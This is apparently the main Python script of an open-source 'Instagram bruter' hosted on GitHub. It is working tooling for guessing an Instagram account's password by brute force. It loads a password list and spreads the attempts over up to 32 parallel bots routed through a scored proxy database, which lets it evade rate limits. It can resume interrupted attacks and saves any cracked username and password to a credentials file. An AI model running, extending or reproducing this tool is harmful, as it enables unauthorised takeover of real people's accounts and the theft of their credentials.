-
Notifications
You must be signed in to change notification settings - Fork 113
/
instagram.py
284 lines (223 loc) · 7.39 KB
/
instagram.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
# Date: 12/29/2018
# Author: Mohamed
# Description: Instagram bruter
# from lib.proxy import Proxy
import os
import time
from sys import exit
from lib import database
from lib.proxy_manager import ProxyManager
# from os.path import exists
from lib.bruter import Bruter
from lib.display import Display
from platform import python_version
from lib.const import credentials, modes
from argparse import ArgumentParser, ArgumentTypeError
class Engine(object):
def __init__(self, username, threads, passlist_path, is_color):
self.resume = False
self.is_alive = True
self.threads = threads
self.username = username
self.passlist_path = passlist_path
self.display = Display(is_color=is_color)
self.bruter = Bruter(username, threads, passlist_path)
def get_user_resp(self):
return self.display.prompt(
"Would you like to resume the attack? [y/N]: "
)
def write_to_file(self, password):
with open(credentials, "at") as f:
data = "Username: {}\nPassword: {}\n\n".format(
self.username.title(), password
)
f.write(data)
def start(self):
while self.is_alive and not self.bruter.password_manager.session:
pass
if not self.is_alive:
return
if self.bruter.password_manager.session.exists:
try:
resp = self.get_user_resp()
except:
self.is_alive = False
if resp and self.is_alive:
if resp.strip().lower() == "y":
self.bruter.password_manager.resume = True
try:
self.bruter.start()
except KeyboardInterrupt:
self.bruter.stop()
self.bruter.display.shutdown(
self.bruter.last_password,
self.bruter.password_manager.attempts,
len(self.bruter.browsers),
)
finally:
self.stop()
def stop(self):
if self.is_alive:
self.bruter.stop()
self.is_alive = False
if (
self.bruter.password_manager.is_read
and not self.bruter.is_found
and not self.bruter.password_manager.list_size
):
self.bruter.display.stats_not_found(
self.bruter.last_password,
self.bruter.password_manager.attempts,
len(self.bruter.browsers),
)
if self.bruter.is_found:
self.write_to_file(self.bruter.password)
self.bruter.display.stats_found(
self.bruter.password,
self.bruter.password_manager.attempts,
len(self.bruter.browsers),
)
def valid_int(n):
if not n.isdigit():
raise ArgumentTypeError("mode must be a number")
n = int(n)
if n > 3:
raise ArgumentTypeError("maximum for a mode is 3")
if n < 0:
raise ArgumentTypeError("minimum for a mode is 0")
return n
def valid_float(n):
err_msg = "prune must be a value between 0 and 1"
try:
n = float(n)
except ValueError:
raise ArgumentTypeError(err_msg)
if n < 0 or n > 1:
raise ArgumentTypeError(err_msg)
return n
def args():
args = ArgumentParser()
args.add_argument("-u", "--username", help="email or username")
args.add_argument("-p", "--passlist", help="password list")
args.add_argument("-px", "--proxylist", help="proxy list")
args.add_argument(
"--prune",
default=-1,
type=valid_float,
help="prune the database",
)
args.add_argument(
"--stats", action="store_true", help="get statistics of the proxies"
)
args.add_argument(
"-nc",
"--no-color",
dest="color",
action="store_true",
help="disable colors",
)
args.add_argument(
"-m",
"--mode",
default=2,
type=valid_int,
help="modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots",
)
# ----------- #
arguments = args.parse_args()
username = arguments.username
passlist = arguments.passlist
proxylist = arguments.proxylist
prune = arguments.prune
stats = arguments.stats
prune_db = prune > 0
if not (prune_db or stats or proxylist) and not (username and passlist):
args.print_help()
exit()
return args.parse_args()
def prune_database(prune: float) -> None:
score = prune * 100
if (
input(
"Are you sure you want to prune the database of proxies? [y/N]: "
)
== "y"
):
print(
f"\n<<< Pruning the database of all proxies with a score of {score}% or less >>>"
)
time.sleep(0.65)
print(
f"Pruned the database of {database.Proxy().prune(prune)} proxies"
)
time.sleep(0.65)
else:
print("Pruning cancelled")
def display_database_stats():
data = database.Proxy().stats()
place = 5
q1 = round(data["q1"], place)
avg = round(data["avg"], place)
min = round(data["min"], place)
max = round(data["max"], place)
total = data["total"]
health = (
"Dead"
if avg == 0
else "Very-ill"
if avg <= 0.10
else "Ill"
if avg <= 0.30
else "Somewhat-ill"
if avg <= 0.50
else "Normal"
if avg <= 0.70
else "Healthy"
if avg <= 0.9
else "Very-healthy"
)
print(f"\nTotal Proxies: {total}\nDatabase's Health: {health}")
print(
f"Q1: {q1} :: Avg Score: {avg} :: Min Score: {min} :: Max Score: {max}"
)
time.sleep(0.65)
def main():
arguments = args()
mode = arguments.mode
username = arguments.username
passlist = arguments.passlist
proxylist = arguments.proxylist
prune = arguments.prune
stats = arguments.stats
prune_db = prune > 0
if prune_db > 0 or stats:
if prune_db > 0:
prune_database(prune)
if stats:
display_database_stats()
else:
if proxylist:
if not os.path.exists(proxylist):
print("Invalid path to proxy list")
exit()
print(f"<<< Writing proxies to the database >>>")
time.sleep(0.65)
total_written = ProxyManager().write2db(proxylist)
print(f"Proxies written to the database: {total_written}")
time.sleep(0.65)
total_proxies = len(database.Proxy().get_proxies())
if username and passlist and total_proxies:
if not os.path.exists(passlist):
print("Invalid path to password list")
exit()
Engine(
username, modes[mode], passlist, not arguments.color
).start()
else:
if not proxylist or total_proxies == 0:
print("No proxies in the database and no proxy list provided")
if __name__ == "__main__":
if int(python_version()[0]) < 3:
print("[!] Please use Python 3")
exit()
main()